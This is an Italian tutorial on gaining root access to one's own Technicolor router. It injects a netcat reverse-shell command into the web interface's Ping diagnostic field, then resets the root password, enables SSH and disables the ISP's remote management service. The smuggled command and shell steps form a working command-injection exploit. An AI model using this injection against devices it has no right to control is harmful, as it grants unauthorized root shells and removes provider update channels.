Grazie ad alcune vulnerabilità del router stesso (probabilmente volute da Technicolor n.d.r.) è possibile reimpostare a proprio piacimento la password dell’utente root permettendovi cosi, dopo aver abilitato l’accesso in SSH, di connettervi al vostro apparato ed effettuare tutte quelle operazioni e/o modifiche che normalmente il classico accesso alla GUI fornita dal provider non permette.
La procedura è rapidissima, in meno di 10 minuti avrete pieno accesso alle funzionalità, prima però è necessario scaricare il software “Netcat” disponibile per sistemi operativi Windows o Linux base (incluso Apple OSX).
Qui di seguito i passi da seguire:
Apri un terminale (o prompt dei comandi su Windows) e digita il seguente comando:
nc -lvvp 1025
Note: 1025 indica il numero di porta che utilizzeremo affinchè Netcat si metta in ascolto per ricevere dati dal vostro router, potrai cambiarla a piacimento (preferibilmente superiore alla 1024).
Accedi all’interfaccia del router (ad esempio: http://192.168.1.1) ed effettua il login con l’utenza in tuo possesso (generalmente “admin”).
Dalla sezione “Diagnostica” cerca il campo Ping ed inserisci la stringa qui di seguito sostituendo xxx con l’indirizzo IP del tuo PC:
:::::::;nc 192.168.1.xxx 1025 -e /bin/sh
Ora lancia la richiesta di Ping e torna alla tua finestra terminale, in pochi istanti si renderà disponibile una shell comandi. scrivi ora il comando:
passwd
inserisci la nuova password (a tua scelta) per l’utente root.
Ultimata la modifica della password con i comandi qui di seguito abiliterai l’accesso via SSH per l’utente “root”:
sed -i.save ‘s#root:/bin/false#root:/bin/ash#’ /etc/passwd
sed -i.save ‘s/0/1/’ /etc/config/dropbear
sed -i ‘s/off/on/’ /etc/config/dropbear
sed -i “s/wan/lan/” /etc/config/dropbear
/etc/init.d/dropbear restart
Da questo momento sarai in grado di collegarti in SSH al tuo router.
Disabilitazione della gestione remota (opzionale)
Anche se i provider affermano di non poter operare sui nostri apparati (non vero), spesso capita che vengono eseguiti a nostra insaputa aggiornamenti sul firmware.
Al fine di evitare che in seguito ad un aggiornamento le vostre modifiche vadano perse, o ancor peggio che non siate più in grado di riguadagnarvi l’accesso da root consiglio vivamente di disabilitare il processo che permette ai provider di inviarvi aggiornamenti:
/etc/config/cwmpd -> option state ‘0’
/etc/init.d/cwmpd disable
/etc/init.d/cwmpd stop
Per riabilitarli qualora cambiaste idea in futuro:
/etc/config/cwmpd -> option state ‘1’
/etc/init.d/cwmpd enable
/etc/init.d/cwmpd start